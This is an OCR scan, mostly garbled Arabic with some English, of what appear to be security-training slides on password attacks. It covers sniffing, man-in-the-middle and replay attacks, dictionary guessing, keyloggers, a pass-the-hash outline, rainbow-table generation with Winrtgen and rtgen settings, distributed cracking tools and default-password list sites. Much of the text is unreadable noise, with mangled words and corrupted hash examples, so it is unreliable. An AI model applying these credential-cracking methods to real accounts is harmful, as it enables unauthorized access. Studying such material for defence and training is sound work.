.passive wire sniffing J ^ J"VI J^ ^H*JI Cj! j^Vl c> 





m 




Q Attackers run packet sniffer tools on the 






local area network (LAN) to access and 
record the raw network traffic 


Ham 
Perpe 






Victim Attacker Victim 



The- captured data may include sensitive 
information such as passwords (Telnet, FTP, rlogin 
sessions, etc.) and emails 

» Snifft?d credentials arc used to gain unauthorized 
access to the target system 



Passive Online Attack: Man-in-the-Middle and Replay Attack 

J .Ul£-a ikU j^xuJl (man-in-middle) Jajuijl! J cJ^j 'u^j^ 3 Jj^aljiill Laiic. 

„ JU^jVI l! J 3 Jc- jj^j L — ij ^ a ^l jl ^— j^^^I 4 ciJliill 
.c^jll J JL^iVI (> u^WJ^ ^ J^(sniff) ( "u^nti (man-in-middle) < *« > ^Ti*l l J J^jil J^ ^ 
(JjoiLjjj ^ISjV l^iaj cjLo^J! (JiLo ^jijj J^juJI j* ^jjjJ - aj^Luj^UI CjUj^illj telnet J ^ j?^^ ^ ^ (><n ? j ^ 

# jj^JI <^^>^. JUajU (jU^V! J j ju ^ o^^j ^^j^ t ," t j^^^ 1^ jjuJIjXCP 

CjUi jIslaII ^Ij^i>hI ^jj Iaaxj .(sniffer tool) ^j^jjSI CjI j^I ^1,^1 mU ^j^JI Jalislt ^jj t replay attack '^IcVI ^ J 
replay .^^^ c1l}L<Ajl-<J! %Ac.y ^,^lun jl ^ ^ I^a ,a£jjoJI Jc ^^>^.l oj-g ^^Jl ^jja j ^jj t^^JI j^ 
.cj!1jj^j3I J ^jbjlt tik^Vl ji jl j£5 J 5Ui CjUIjJI Jij <> <!jUu» ^ j^l ^Ijjl jlbank transactions 
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Original Connection 



VitLim 



Sniff 



MITM / Replav 
Traffi c 



Attacker 



Wob Server 



Gain access to the 
commu ni cat i o r 
channe I s. 




I 



In a FVl ITlVl attack, the attacker acquires 
access to the communication cihannels 
hetvueen victim and server to esctraet 
the information 



In a replay attack, packets and authentication 
tokens are captured u ±, i n a sniffe r. After the 
relevant info is. extracted . thetoker^ are 
placed back on the net work to gain access 



Considerations 



Relatively Hard to 
perpetrate 

Mu5t be trusted by one or 
both sides 

Can sometimes be broken 
by invalidating traffic 



Active Online Attack: Password Guessing 

(j-Q iiiaJI J (JLujIaII t (dictionary attack)^ ^ ^W^-^ 0 s^^-^ ^ > ^11 ciiiLalx-alt Jc J j> *aaJI 
'(dictionary) ^.L^l j cj! <c j-^^ iaUj ^i^-all 6A_i^_l<JI £>i& J .c*L <j^Lk]| jj^JI (jj^v^ <JjLui 

different 'backwards words :Cjla^\lkVI <> iji*1I <!jU^ J ^ cJ^I <> J*^ ^ .s^ljll J CjUKII 

.jJI i4J-^\ Jl ^ISjl AiLjal c capitalization 

(j^UiVlj ^UjujVI ^UjjujI jl tA-nl^j CjUl! l— )l a - aJJ ^31 ojjU^ll (Jjj^I jaII (jjift^l g a\\ o ^ ^ t^)j£l 11a (Jj^ i lu] 

jjj>J| Jjoi^J Jl2 jll fit A^W i^Ktll (iL 4_x-£al_iJl ^xi^LJl (j^a^a Uiajl (jJ-^lg-xJl . JJ^3l ( ** & ^ J JU ^ J^J^ CS"^ ^-^^J 

^Jj^ia (jc iiL A > <al -sll JjuJI *LoK AjLa^J ^*ll^J tillil tl^ll^J L-Jxj> .oil ^ ^j^3 j tlA ^jl cJ^-^^ L>^ ^ 'V>^ 4_j^Lk3l 

l^jisu jj£I ^LJj^a!i3 tl^iisu jj£I 4> 3^UJI jjJI b ^jS jjII CjU^Ic- j ^jVI ^U^^ cM^) ci^J^ 



The attacker takes a set of 
dictionary words and names, 
and tries a If the possible 
combinations to crack the 
password 



At t a ckc r 




O 

Netwo rk 



Considerations ■f 
—I Time cons Liming 
—l ftiecujires huge amounts of 

network bandwidth 
—l Eas ily detected 
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,1^1ia^j3 ^Lj^ 3 Liiij ^L 

.4£jj^13 ^^jjll (jUail! (jx» 4jjU CjLl<£ L-illaJJ 

j£judJ Ail nl'^l (j^-^ 



Active Online Attack: Troj an/Spy ware/Keylogger 

Ullc- tA-iikJl ^t^-al! (jsw }} ^J^}J tA-JlxJl 4_nxjuJl dili ^l^IjjII (j>* (^joijjj £c-gLjj £a IfrLboaJ ^jj S jjt > ^ SjLS j&Trojan ^JljjJa (jLt^A 

.AjLLj Aijjoa j 6 jlgA (jl jikl jl 4_i^jJa3l ^IAjJI j3 t -fllauJal Jc j^JJJ La 

^cjoiij <illi O^J S- 5 J^^y* ^Af^J L^J^ J£ ^illj l^joiij s-tali (j>» ^cjujLjj V j3l 6j>»A^!/<liiiJI CliLia ^j;^ (j* ^ jj j& 

L>^ Jj .^^1 ^Ld jlx-<Jl (JJjujj <j| j-aVI £-31 J J O^J S- 5 J^^y* ^A^J *I^V 4-^1-^1 J J^LjjII ,<ln^Jl <j3 j*^- 

/ jjj^^ J] ^ ^j' J j^l jjjj Jll AjiftVI CjI^suII jl(backdoor) AjalaJI l_jI jjVI Jc- a^jxj <jL^VI 

JILg (_£J^.I CjliLa J Ig uiij (jSa. <J jIaj V 6^1 jj^a 4 L^a^.) .(jj^laJl ^Lq^JLuiaI] *L}JJ-a JJC- (jj^J (jl J) 4_liiaJl L_j| jjVI £>i& j 

dll^j^xJl 4_Iajail jJ LlL^Ljjjll AAaJLaaJ .J3 j .L-flJjJaxJl JJ jjjrt^l *L<Jajlj JjJaJ jl tdlLd jLlaII (JJjujJ j3 S,j| JJ^a 4 L^a^.) . JJ jjja^l CjLuj JJJS 

^Jc. Uj^^' *OK^ m1 ^ (J^^^LjiaH ^^ic (jjjjud^jll L_J -\\\ A uA± dlJJJ AjjjuiI ^ (spyWare) (J<n n^llt 

;dj^)ljyi aJ (Jlxi ;4_i^a^jua3l CjLd jlx-<Jl t * a ^^ a ^-<^ 1 g ^ »aJ (Jjjjoi^jII ^<il^)J _Aj^a^)3l ^^>^-<i jj^-?^ ^ ^ (S ^ C5^1 ^UJ^ ^ 

|(JiL<» 6^1^ oAsu ^-J ^a£^JJj tl^J L_lL^a>Jl jfl jA1j&1\ Jc ^laJjoaJ (jl Ljajl ^lx»I^)JI d^J (j£-<»Jj _l^JjLj ClbaJ ^^jll ^51 j-<Jl Aj^ajj 

6L_lJj3! Q^ajxluu* A-l^. jJ S^lcl 4L_lJj3l f^yajxluij^ ^-1>.>UJ^)3I <^ij^3l JJJ*J tClJlj L_fl^)ia3 4_ijlc^ djl^jlc Jjj^J iAf \ > >il ( ♦ 

djl^l^cl ^IXJ (jl (jjjjud^jll ^cx»l^)i3 Ljajl (j^J .CjLuJj^iill (jx» ^3^^ ( ; UjujJJ (jl I g Jl uj (jx» (^5-^lj ^ ^ ^ Q A J J - ^ ^4^' 

p jjir > ^1 CjIcLj^ a Cj^Ja (jjjjoi^jll ^<il^>J JJ&-^ .CllJjJjVI A£jjoU JL^jVI Jc jjjUIIj AlLaJ C^^JJ Lui 6 jj jJAx^ll 

c qVi^ ^ J (jjjl djjAj^l j 6 jj* jjax^II (j-dl cJW^ J £^!^>^1 ^ l>° (j'i>'Q*^l ^ ^ M ^ a 2^!^ c — la ^ a ' ^ j 6 ^ (p^^a ^ J-<iLtj3l J 

SjJaJjqJl t * a ^^; jj jJJ^SI 4^JJ C5^^J J^^^)^^ 6, ^ J sjj-- ' U^ 1 ^ ^JLlSI s-L^il 

^il j-<JI ^.1 (jxi a La^jj ^ j£i dijl jl Jj>»jVI jjc lS^j^ o ^c^Ljj j (jjjjoi^jll ^Lx»l jj ^.1 jl ^jjlLa <ja. jl ^alj ^alhj Keylogger 

Clal^ Jl ^jjILJI <ja. jL t . n£j Ail^ (Jib (jjjjoi^jll ^cxiLjj ^ajL dlla ^aisu V dj-j^ <jjI a all £c-g! jjII (j^> >i (jj^J jl <3jJ j>Jl JJC. 

^.1 6^1 Jjia (jl > <aa cJ-0JU (jj^J Li <JjoiI Axj (^^1 j djljjl^ll J^a^.1 J& li^ j t^c^Ljjll Jjajj-d jl (j>iui^Ml L— L^.L^a Jl o^lc ft^au 

J ,(jLujVI diliUaJ ^alijl cJ J^-^l ^^1 ^ j J^l ^jl .L^_ilc ( . u£j Li Aijx-d j ^ m ^ ^ j^-l ^J^l J-<J ^AaJLujJj (j>iui^Ml CjLuj jjjS ^l jjl 

55 J^ ch 1 ^^ I j (J^\a j <jjjiaJI 4JjAa3I J ^al ^ <jLjl jJI aJIj^jsII <IajJa3l cIi^Ia ^2009 a^ c *°>^>V^ 

^jjjLjl jj]| (jjilal j>Jl (j>» 6jJj£ ^l^cl 6 j^J>l J 3 alia a ^lx»I JJ jjoU 4 afrjj — J ^jLall (jjoJl daJ ~* La KeylOgging ^juoJ — 1 - uj 

^LgjojI (Jj^ i ujj dula 1^. djjxj^II ^xiljjll _dijjjjy I Jc Aj£jj]| ^jLLoi^. Jl <J jll jj* jjj^U ^ i^JLujI J^ljk. & jy^ L» (><1 V > "j 
J l_j jLojVI I^-j J-^l f^-^l^ ?4ji}ji»3! 6^j l^jajjoj cIlqj Jll ^JLiaII m aA > ^t>1I .jljal Jl I^jLujjI j ^ajjj-g CjI j (jj^.^lui^ll 

jjj 4jjoj J c atiai ^ ^S^l ^jL J1«q (jxi jV (jj^ 4.7 >J^aloJl ^LlSI (j-d jjL» J^-*JJ 



^aUaj (j-a ^^kjjaixJl Jj3 (j-d ( flltjj jll J jjJ^lVI ^J^l cJ^Lojj djLjl^xi (jC t Lu^ll Jc j^ls KeylOggCF 6 JL^I l!^^ Jc- 

Keylogger ^ c^^l 

Active Online Attack: Hash Injection Attack 
J^l\ 11a ^l^ki^l ^ ^ <j1^ ^Luk J compromised hash e j* (Hash Injection Attack) lh^-!I 

;^aAj ,C1jI jL>^ ^jj! J ^^-^ ^ J?w^ ^ .'^f^l ^jl Jj ^3^L^a13 

1- The hacker compromises one workstation/server using a local/remote exploit 

.axj (jc jl l jU a *\ jjoj exploit (j^ jl^j> jl ^1a (jljlkL ^.l^JI ^jij dii^. 
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2- The hacker extracts logged-on hashes and finds a logged-on domain admin account hash 

3- The hackers use the hash to log on the domain controller 

A^aj j ^1 J j^-^ * ^ (J^-g-^ ^ alAklLuAj (j^Gjlj 

4- The hacker extracts all the hashes in the Active Directory database and can now satirize any account 
in the domain. 

.u^j-^ ls* S-^ ^ l$\ > (jVl Active Directory s^c-lS ^<J! (jjjlg.II ^ ^ ; u^j% ^j^IjSJI 



Inject a compromised hash into a local session 






Attacker Victim Computer 



Offline Attack: Rainbow Attacks 

e-LuJ (jjj^i lij . jjj-<^ (jjj^i t fl-j^ -^-^ ciu^ . jjoJI ciLaK <^j^a ^ j^v^U <Jj^JI Offline Attack 

dijl£ .cjS jll <jt-ijjax CjUl^a Offline Attack . ji^^l cJ^-^ tS^ljSll <JjIS <J£j^ ^ 1$j Jalil^VI j ^j^^ jjj-^ djUJ£ 
<ati^ djluii jajiij . keyspaceJ j j*^ yr* j c LM hash d& t> 

# jj^JI CjIaK c fll un^y ^.l^xJI ftLaAaJLujj Offline Attack ^ ^a o-a (jlc- jj ^IUa 

Rainbow Attacks 
Distributed network Attacks 
Rainbow Attacks 

Cryptanalytic time-memory trade-off .cryptanalytic time-memory trade-off ^ j& Rainbow attack 

l^jj^j j <LLoj ^ (j£Ia ^^^ic ^jii^j jAa. *L<i^L<i <L^)iaj ^Laul ^jj c ,% n^> jLojVI ^Aa^Lujj ^Rainbow attack 

." rainbow table" Jj^l V* .SjSlill 
Rainbow Table 

. (cipher text)j^ o-^ c> jjj*^ *^Ui^l ^ 1 > ^ > ^ ^^ki^l d^j Jj^. Rainbow table 

_^)jaJl 4^<J£ ^jjjIa 4^<J£ o^IxJjujI (JjL^Jj ^)J^y^\ ^jc dla ill (Jj^Jl I^A a^I g aII 

Computed Hashes 

.(Rainbow table) cJ^ ^ c_j j>^<> J ^ t^lli uj^ ^ jjoJI djUJ£ ^ <Ajla ^^ic J j> (j^l^S! t ^l^lt 

Compare the Hashes 

. (pre-computed tables)^f^ s- 5 j^ = ^ J j^h ^-^ <>Ji3l ^ djUK s^Ulail J^J^ a* 

Pre-Computed Hashes 

c aL&II ^jl£ lil , (dictionary attacks)^ CjU^a ^jJa ^j^JI <Laj,^c l^jl djUiil 1 ^ £ aj l^jjj^j ^jj c _^j3I SjLIaII djUJ£ 
^jjoJI t - \\ ^ia^. (^^Ic (Jj^a^j g aII ^jli ^UlUj /o^iuirt jj^>^i ^ L^jjjILo aj (3^J aI^jjojU ^lall 
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c T Jkb U> 15> NT hash ^ j cjjU 310 £^ j LM hash JS* Sja* * jSli ^UL^ c T Jkb jSl^l jj>j 
.jSl^II s c> ^Jl cillij time-space tradeoff technique ^ pb^J .^W 5652897009 



lqazwed -> 4259cc34 599c530b2 8a6a8f 225d668590 

hh021da -> c744bl716cbf 8d4dd0f f 4ce31al77151 

9da8dasf -> 3cd696a857la843cda453a229d74l8 43 

sodifoSsf -> 7ad7d6f a6bb4f d28ab98b3dd332 61e8f 



Tools to Create Rainbow Tables: Winrtgen and Rtgen 

cjIjjSH ^ijHyiL Rainbow Tables Jjl^ Ij^jSj o^l^Ji 

Winrtgen 

http://www.oxid.it/proiects.html : j^-a^ll 
. jj^JI jSaj I^lL dii^ j^l^ll ^l^i ^Jillj Rainbow Tables Jj^ a^j^ j *bl y> Winrtgen 

LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, 
SHA1, RIPEMD160, MySQL323, MySQLSHAl, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384) and 
SHA-2 (512) hashes 

;<jiun <jiLi3i j^kia Winrtgen.exe g- 0 ^ j^l isa^ j^W -1 



Me 



Winrtgen v2.S (Rainbow Tables Generator) by mao 



c 



Filename 


Status 

























































Add Table 



Remove 



Remove All 



About 



OK 



1 



Exit 



J 



i^iai^uil j^ua Add Table 6^ -2 



FLainbov-v "Table properties 



I S3 | 



■ Min Len — i — Maw Len — i i — I n 



M -3 :-: Len - 



- C- hi -a i n Len 



HQ 



C hi -a i n Count 
40000000 



r- J ; of tables 



- Chars 
| alph.= 



|ABCDEFGHIJKLMNOPQRSTUVWXyZ 



— Table properties — 

Key space: 3353082582 keys 
Disk space: 61 □. 35 MB 

Success probability: 0.373033 (37.80^) 



- Benchmark 
Hash speed: 
Step speed: 

Table precomputation time 
Total precomputation time: 
Maw crvptanalysis time: 



-Optional parameter- 
| Administrator 



B enohmark. 
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diaj ^5 ntlmj^^ ^ WtL* 4^c^j ^ill ^jijlgJU <^jIS ^^ic ^ jl^J Igil HASH ls j^*^ -^j^ es-* ~3 

.4000000 chain count U 9 jt&j Max Lenj 4 t>M Jj^ J 5 * Min Len u'j^ 1 

m jjj*l\ c_jjai^ liAj s j^^JI ^jj^JI loweralpha Charset u^j^ 3iiiuJt <jUJI ^ -4 



Rainbow Table properties 



r Hash- 
| ntlrn 



|— Min Len — i— Max Len — i - Index 

P~ F~ [°~ 



|— Chain Len 
|2400 



Chain Count- 
|4000000 



N* of tables- 



1 — rhpirftRi' 




| loweralpha 




| abcdefghijklrnnopqrstuvwxyz 



Table properties 

Key space: 5646683807856 keys 

Disk space: 61.03 MB 

Success probability: 0.001687 [0.17^] 



■ Benchmark 
H ash speed: 
Step speed: 

Table preconnputation time 
Total precomputation time: 
Max cryptanalysis time: 



Optional parameter - 
|Administrator 



Benchmark 



□ K 



Cancel 



J 



.l^LJI *L^y ok tij^ j^j -5 



Winrtgen v2.3 (Rainbow Tables Generator) by mao 



[I] £3 



Filename | Status 


[III" ntlrn Joweralphatt4-9_0_2400x4000000_oxidtt000. rt 





















































Add Table 



Remove 



Remove All 



About 



□ K 



Exit 



.i fllall ^Uijy ok c3j^ j^" A -6 
.charset j hash ^ j^^' l^&l CjSjII L p a *j ikL lJjjoj ^l^lt Jj^- -7 

Rtgen * 

http://www.project-rainbowcrack.com : j^-a^ll 
liA .jSl^il time-memory trade-off technique i> a£^3 ls^j ^ c'j 2 ^ j* Rainbowcrack 
rtgen .Rainbow table Jj^ ^ y?* s j^j 1 ^ rtgen sbl ^I^U ^ . jju£ c*U ^jjAJI 

:Rainbow table J j*l jVI c> yJ^I *Uj fl.ik2J h&S «j ^Rainbow table J ^ j*l cjX>U^]I ^jAxJI 
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I^VlS^ljVI jkJ 4^1*11 
#rtgen©hash_algorithm©charset©plaintext_len_min©plaintext_len_max©t 
chain_num©part_index 



Administrator: Command Prompt - rtqen ntlm loweralpha 1 7 0 1000 4000000 0 



- d x 




Offline Attack: Distributed Network Attacks 
d ja ^ v^mj -ul diia. . ^^Jl CjULJI s^UiuiV < ^vim^ l ajjSjII ^ Distributed Network Attack (DNA) 

^j^ja £3 ja DNA ruanager ^uffi ^ 6 ^ j^-s-^ I^a . jjuJI CjIaK jjii*^ t^lal jjc diWI A^vim^ a^JLlaH 
p t bl&s 4^ j^j| j^iii DNA manager .4lf£ill aJ] J j^a jll ^il^ DNA client J^-^ ^VbU di^ 

;4_iLLj| DNA client .a£j^1I *UjI ^k cjUIUJI ^ J**!! ^jjj jjSj key search c> 

1 g ^ iklLoLjj A^jJolL ^ L alall piLaaJI 4-3^1 £l11*-a1I Cjlj^a ^jJJ ^cxaUjill .^lIIjlaII ~ iaJLma J;iiJl ^3^^ f ^ILujJ lilla 

e( u jjLB M 2000j Office 97 c> ^ *>J^V 

:DNA ^tj^> 

a1 jg > n j 4_ljLjJl ^a jjuj^)1| j djI^U^^Vl I j£j 
jjudll Jjoi£J Wu (Jj^I j3 L_flJjJaJ 

A ii* a dalxll Jj^)-all A>J£ fit ^ ^ ^jjai^j 

.stealth client installation <^ j - 
.DNA lS^*13 ^jISIjII dij^b ^ - 

.^!>Ia3l!I <J ^ajli ^ill (JaslSI ^^Jj ^.^IaslSI ^^ic jlaJjuiJ 

(2Module) &h.^j J> DNA fll j»j 
DNA Server Interface -1 

(DTV^ Server Module) DNA ^ j jflji .<aiA DNA * j^V aH> ^^! (ZW.4 Server Interface) DNA j 

; 4-g-a.l jll £>i& puiVn j a lA.^iqYii DNA c ^ h jll ^jJa j ^^jjoiaII 

s^a. j Jja ^ l^iaLjal ^1 aJUJI jll jUajj) <xjIS ojUc^ ^ : (Current jobs)^^t Liillajil 
^1 j j Jil DNA cia t> l^inxj ^ ^1 (ID) ^j^i ^jJ^ cS^dVI c> Ud^ (Current jobs list) jll 

/ alia A OA^C-Ij A£ a\\ 

^ lA^ ct^ 1 ^Uijll Jja. CjUjkJI (Finished jobs list) ^Uijll ^IS jajj : (Finished jobs) j^^fj) LiiUajil 

S^ift&Vl ^ lU^j .^^J^ c^jUi jll ^1 SaaoVI c> ^^Jl 1 > >>jl aj^I 4jgTi*ll t^jUi jll 4^jIS . jjj^II <-alS t*Ui ^ Uj Ujji>:^j 

tilflj jjjjuall ^ ^^kloi^ll ^ULaJlj " aIaII t^la jLoa-d t ji>.a.ftll t flLdll ^jujIj 6<Lia jll D^J DNA (J^ U^*^^ Cf^^*^^ 
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J**]! *1$j£U DNA ^Ikjl ^ilt dia jllj ^j^l t^iJa jit JaxII DNA ^Ikjl ^ill da jllj ^jjWI « al^ll 



DNA Client Interface -2 

jSaj J^*^ cjUU^I . (workstation) J**!! clk^* t> ^> l^l^kl^l jIaj (DNA Client Interface) DNA 4*^1 j 
^jAxJI ti!U& .DNA l!^ 1 *-^ c3jj^ c_ ujjj ^li jll jli .DNA lS^c- ^-g-^ j ^Ia^iLuAj <U un l^jmn 

6 (current job")^^^ ( **^ f ^ 1 ^^Ij 4 DNA lS^^ ls C5"^ ^ j ^ ' DNA l!^^ W^J-*^ C5-*^ j> Wll 

jlj^J! ^jj^ .i£iiJI Sjbl (>a>J Jj^j (The Network Traffic application) jjj* 

JjL J^j DNA l^^ki^j ^1 aAj^I ^^i^j (The Network Traffic dialog box) a<^\ jjj* a^j^ 

c> lUs u ( DNA 6 (work unit length)LUJt s^j Jj^ ^l^ki^U .DNA Client c> (work unit length) lU^ 

cfe .lU^I s^j JjL ajI^j j ^ DNA JL^SVI i <uJ DNA Client 3^ .DNA <^ J^V! ujP 
^^^ic J^-^ ^^>^] clA^ 6a£jjoJI ^^>^ jl Cy* ^—^-^ fc*^ ^ UiAjc .DNA j J**^ j^ 3 -^ <UL^. ^A^LuaxU 
lil .<j£i *i\t jj^ ^-c- j^j (jli (work unit length) <J**^ j J LqaIc- _ (_Jaa*JLj <j^aLkH l1a*JI j 

Elcomsoft Distributed Password Recovery ^ 

http://www.elcomsoft.com : j^-a^ll 

C 35 J 6 ^J^^ j;!^! *^Ui^l j 4 sjaa^I jj^JI cjUK tdl ^xuoij Elcomsoft Distributed Password Recovery 

^<JI jj^Uxil cJ^^ J-<^^ o^IxjjujV UjIjuo^. ^1 j£l ^jq'n ^jjj I^jV .^IjjVI A^iJ ^ djI.Vnui^ll 

Aial jl<i j *^ ja. j-<i NVIDIA j' ATI j^j as^j j j ^jc jjuJI s^LlLujI ^jjoaiil oj^lj^ ^jVqMI ,Ajj^JI jjuj^II cjlc^jobG 

^JjuJI <-<j£ S^txJjol! li^ _^^)jaj| (J^JUdJ <-<j£ 6^1xJjojI (J*^J Ll^. jl J&^\ (Jjfl ^j-d A A GPU ^J^)jaaJj i jfl jl±S&l\ jl^J 

4Jli ^jS^aJ) ^JUlaJ) S^j ^ djUjp) AiUbVb o^j Distributed Network Attacks J£* > 1^ : 4iajal4 

.Liajl GPU Al^Jt lj jj£ gJbua ^ 

U^iK ji tCijj^V! ^LAN Distributed password recovery -2 
.a£j^3U J^Li jjj^ jl^a. ^1 qa SjkixJl Solace management -3 
AjaUb] cjULJI ^ILjuail ^uoij Plug-in architecture -4 
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<S> App ly _» 



^irar faent Jcr^r t*" P 
< ^ AjMHh fcr Start 



clcomcoft Cn^tn t>u ted Paccwofd f 



r. 

__! 

C^:ht An- J Leg 



■ --. -+. il-. L 

Re/a. ssjc 
DB C3>fl.j*a:e 



O.BU 
C.OOO Ifc- 



-Hi, l« "w. 



7 not ayfftsm 
recoitrtcl 



AttWK 



ted = 1, pnjnd - ' 
Objci;b | Rndi 



length 



I AECD^GI^JKl'WOi^STljy'HVWZ 

ns 











• erftne 


J 








Elcomsoft DiitnbuWKa Pass? 









^ (Si etmMi <Si g<*«««« 



Oft T«*H.i 



■Si I-^i - * - 







7 

















- 



Non-Electronic Attacks 
^jjII liA . Non-Technical Attacks^&i U^l l^k Non-Electronic Attacks jj^VI 

(Dumpster Diving' Keyboard Sniffing' Shoulder Surfing' Social Engineering) \^ J^Ls '^jj^VI ^->W$-I 
ls x^j (jb3\ \^ CjU jIslJI ; jj j^all qa\ J j±£ J-i-. Jc JUj cJ^lun Jll ajjoujjII ^ ja^JI j Dumpster Diving 

. jIjVI c> ^jaxJI I^jJ low-tech attack ? ^ .CjX<^>J1 <Loj ^ jla^l ^jia ci^Jj jjj^^ djUK J ja. 
" ^lLu^ix» .1980 « Dumpster Diving jSIjJI ^ 6 ^ c>^^ o^^^^ ' 

.L^_Lq (j^al^jll ^jj ciua ^^LalixJI CjiaJ jl dj^a.j ^^jll q iiLall jl 4^1x11 ^1 ^juj djUi jlx-<JI ^j-d ^1 jjijuij " Dumpster Diving 

4_j ^ J 1 ga^ll jjc. J jj^ jll ^lAa-l^xJl JjS ^j-d l^l^ajjojl (j^J CjUUil! oi^ .l^ill ^3 jll c^^Vl ^1 Jl J^^2 ^1 (jj^J L " ^ " Jill 

_4_jc.Uua.VI <jujA1^JI JiLd CjU»a^Jl c5^>^l ^ J^' Jl I J^^ ^^jVI (j^J j' 'U^^)^^^ J jj;^^ 3 <-la-l Jl 
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c aj£ D^Ulxi j 6 ^Lkill jJJI ^^kiauJI ^ L-jj^U (j£3 j t a -\ > >il j jjc. Sjjj^aj c fl^l j <JL.hj.a3 I (jj^j l&,jj£. Shoulder Surfing 

(jl£ lij La (_£jJ L_jaljJj i <J J^-^ i j& LaiiJ <jujUja3l jl ^^JjoiaII s-I jjoj ^jjILJI <j*. j] Jj jlaJJ lal i mjj ^.l^xJl . JJJ - ^ cJ^-^j 

Lj^jud^ j& * A\ (Jj^j UiAic iaaa U£-<ui (jj^j (jl 1^ .^jWqll jjj^I jl jjj^I j^-^lJ ( ; u£ J (j-i^j ^^jjoixJI 

L-L^joJI <aUaJ jjj^jj 4_Lu^xJl 4_i^jJa3l ^ajL La«jjc- jj^Jl 4_!tL3! <J^x» J Liajl ^ (j-a ^ jjll I^A l— lAaJ ^jl (j£-*J .L_fl^Jl (j>» 

.JaSa JSjl (jc £>jLc <^A aifc Ajj^a^Jl Ajj^Sl flSjl (j* .^JjlkJl PIN J^jj JY1 

CjY^IjjI Ijjuj ^LgIojVI cDLk (j-a CjIaK .jj^j j ^ uj <j^I^<J Ijjoj ^LdioaVI Jc- (Eavesdropping) ^^vfll j^Aj 

J jj^^J] 4} jL^xJl 4 j£ a) (_£j^.l (J J 3 tilU^a (j^jia (jC- JJJ^l Jc <J jj^^JI J J^-g-^ ■ JJ^>^ 

.ii^iu^ll jjuJ! CjUK Jc Jjj^JI (jjlLouJI Jj£ ^^klaui Jj^j " Password sniffing " 
I^jVI j£ j^aj l^Jib a£jj^3I Jc jj jjax^I ^jIj <!Loj j j! J*j Uui < (Broadcast technology) cA<^l\ ^ula 

a£jjoJI Jc ^ j^ jj* jjxq£ u!^ ^LaiJI ^Viui^ l^c La tA-ilAxJl <jojjUuJI ^ _a£jjoJI lillj* C5 lc J>^a jj jjj-<^ ci^ L>* 

^jjjla (jc (JajjJ ^j3I aJLujj (J£ j^»^^ l^l^xijj (j^J JJ jJIa^II 6 (jli ttilli .1^-1aIj^jJj 4.^. jjc. 4JLojj3! (jl ia^.^\j 

;<il3,jj ^Ijill 4_l^lja3l _4_i3l <^J> j-d (jSj ^3 ^^jII (JjLujjII jiajj (jl £ J*13 (j^J 6<9Jjia3l 6^J ,4£jjaJl Jc (JJJ«-^ JJ JJJ^ 

ciL 4-j^aLiJl JJJ-<J1 <aK ^LkcU t flUa^H ^J^-j (jj^ ^ . ^-aK (jC CllaJl (j^ A£jJa3l JjLojjII 4A£ (j^i^q ^J (j-d j 

_<3jj]al! a£jjoJI Jc jj jJJ^ll ^^-^■^ (J^ J^ 1 ^ r*^ ^ J jjc jj jjjd^l Jj cJ j^-^^ cJj^ u1 \ 1 ^ ^ lit & a\\ Jj 

a j$jJ ^UjSI (i^j^ (jc jjjaII djUK (> lJVVI l^x^ ^ j jlLA&S I jli ^password sniffing technique ^l^ki^U 

.6jj£j ^Ld^JjaixJl 4£jjoJ| Jc <L^aJ JJ jJlx^ll 

qa jaj jjc Ic jj Jioj ^ill ^lSaj^aJI <jcUj>.VI ^ujii^SI i jj jjj>» j£3! (>il J : (Social Engineering)4^l*^n 4^H^J1 

(j>» jjj£ J o^IjslxJI djUlj^.yi JJ^ J (jJjk-Vl ^l^. Jc ^jiaJJj (jLoijVI (JJJ Jc-^^ Jc- cJ^^ ^ to^lc .(JLoull 

<jcUu^VI 3 ua>jj^JI ^l^klajU ^I^aII ^jIj (jl 6 Jll<JI J^f^ J^ .'SA^^^ ciil^l j^.VI j>.»^3 "^l^k <j*J" c ^cU»j^VI (JjjU^aII lU*j .u^^^ 
,cjl£jjai3l (j>il ^^j* jll djUi jlx-<JI ^-Ij^jjujI cJj^j t^£jjuJI Jj J jll <J jk-A ^ uj Aiij < . l 4jjL^<» J jj* jjj^Si aSliA ^L^jSV 
<jU 4-judij lAjj^j ^^1^ aI3 (j^j .swaying people j» ^I^JI ci^ o -0 ^j^^ jl*-^! J^^- £y* Jjxjuiill c _^a <jcUlL^.VI ^aj.jj^!l 



(j^i^ ui (_^l _(jj5JJj (jj^jLd 1 ^jj^J (jl (JjjIj13 ^^^JtJjJall (j^a ^^JjoiaII (jxi JJJ-^I Jc (J jj^a^Jl (J^.1 (j-d ^Uajll (J jjjoi^ jl 

11a (j>» I j^l > > n (jJcLal^Vl (j j > aV^ a\ \ (jli .^^Lajll jl e-taAj^al £a Aji^j dllilc ^Ijj] 4_IjL^x» l!*^ ^J^- 
Aia« o ,CjL<» Jx-<JI Ua. jl jj^J Jc JJJ^ cJ^^ AaIsu jll AiUjll oi^ <j£I j>i Jc (JjjUII ftj^S ^a^C Jc Axusu AjcIaI^VI 3 ujA1^-1] c^J^-f <-<uaJl 
ift^lc _ JLoajll <fljj^J) oi^ (j>» (jj^lilaiJ (jjA^l aII J gJjl J I jjjl^JJ Lq ^til^j l^tLoJ jll CjIa jIslxJI <-djS (j>» 4_1ij Jc I jjoJ (JjjUII 

-c _^c jll jjlk j 4l_jjj^j3I j tc fljjjjll ^la^ JjJaal .<-<»ja CjIa jlx-a (jc d^j CjUlijll t il j£ ^ J I jl^ n <jc! aI^VI (jjui.V^ a^I 
.Keylogger ^I^IujU ^jjILJI cA U± > ^ 4_LjJ jj lJ^JI ^ Keyboard Sniffing 

Default Passwords 

http://securityoverride.org/default-password-list :ja^JI 
Jll AjjJaljjaVI jjj^I (jj£j U S^lc .Saj^. CjIax^I 4*u^a\\ Cj1£jj^3I U ja jj Jll jjoJI CjUK AjjJaljjaVI jjoJI CjUK 
I^aI^jjujI (j^-ftJ j3l djjjjjVl djl j^l . J jVl .jI^jcVI 5-ljji jl^-aJl Jl cJ jJI ^-^>.nj 4ja^ a\\ jjuJI 6 j^.bl! 4f\i^A\\ djl^jjoJl 1 A.Vql 

. JYI* jjaV! j^l CjUK (> c^jll 

http://cirt.net 

http://default-password.info 

http://www.defaultpassword.us 

http://www.passwordsdatabase.com 

https://w3dt.net 

http://www.virus.org 

http://open-sez.me 

http://securityoverride.org 

http://www.routerpasswords.com 
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Manual Password Cracking (Guessing) 

jjJI cjUK .^Uajll JJ Jjj^ijII ajII <^UJI cilU^ jjlj ^ill cjUUJI ^-tiL* ^ jJI .(Manual Password Cracking) 

